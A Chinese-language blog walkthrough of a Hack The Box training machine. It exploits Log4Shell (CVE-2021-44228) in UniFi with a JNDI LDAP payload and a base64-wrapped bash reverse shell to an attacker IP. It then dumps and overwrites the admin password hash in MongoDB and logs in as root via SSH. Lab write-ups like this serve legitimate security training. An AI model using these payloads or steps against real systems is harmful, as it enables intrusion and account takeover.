277 字
1 分钟
记模拟渗透-HTB-Tier2-4

db_nmap -sV 10.129.147.254
image.png

发现8080是个网站,打开
10.129.147.254:8080
image.png

UniFi 搜一下 :UniFi 漏洞
找到了相关漏洞:CVE-2021-44228
尝试利用。。

监听389端口
sudo tcpdump -i tun0 port 389
image.png

执行命令
将此命令用base64加密
echo ‘bash -c bash -i >& /dev/tcp/10.10.16.20/12123 0>&1’ | base64
image.png

burpsuite抓包里添加这串内容

{
“username”:“admin”,
“password”:“admin”,
“remember”:”${jndi:ldap://10.10.16.20/test}”,
“strict”
}

${jndi:ldap://Tun0 IP Address:1389/o=tomcat}
image.png

sudo nc -lvnp 12123
监听端口
在此send发包
image.png

拿到shell

用script /dev/null -c bash 来使用
image.png

得到数据库信息 mongo数据库
ps aux | grep mongo
image.png

通过查询,得到以下信息
mongo —port 27117 ace —eval “db.admin.find().forEach(printjson)”
image.png
“_id” : ObjectId(“61ce278f46e0fb0012d47ee4”),
“name” : “administrator”,
“email” : “administrator@unified.htb”,
“x_shadow” : “66Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.”,

看到密码为

显示用sha-512加密后的密码
mkpasswd -m sha-512 你设定的密码
image.png

mongo —port 27117 ace —eval ‘db.admin.update({“_id”(“61ce278f46e0fb0012d47ee4”)},{$set:{“x_shadow”:“SHA-512 Hash Generated”}})’


image.png

修改前Adminstrator 的x_shadow值:
“_id” : ObjectId(“61ce278f46e0fb0012d47ee4”),
“name” : “administrator”,
“email” : “administrator@unified.htb”,
“x_shadow” : “66Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.”,

修改后:
“_id” : ObjectId(“61ce278f46e0fb0012d47ee4”),
“name” : “administrator”,
“email” : “administrator@unified.htb”,
“x_shadow” : “66N5j/rR78cHLEi42V$itMyy1nFi5HmeqfR9aV75vp2TXOnCIyN4zyVOW8NVlwU2H7QTqCA.aYuJY/svipLLCBsY9r5FE9eOFs9kjIHW/”,

此时,Adminstrator的密码已经修改为了test1234
image.png

image.png
左侧设置里面最下面,发现
sshKeys
image.png

登录ssh
账号:root
密码:NotACrackablePassword4U2022

拿到shell
image.png

image.png

记模拟渗透-HTB-Tier2-4
https://mizuki.mysqil.com/posts/网安/htb-tier2-4/
作者
Twoc-Prime
发布于
2022-03-29
许可协议
CC BY-NC-SA 4.0

部分信息可能已经过时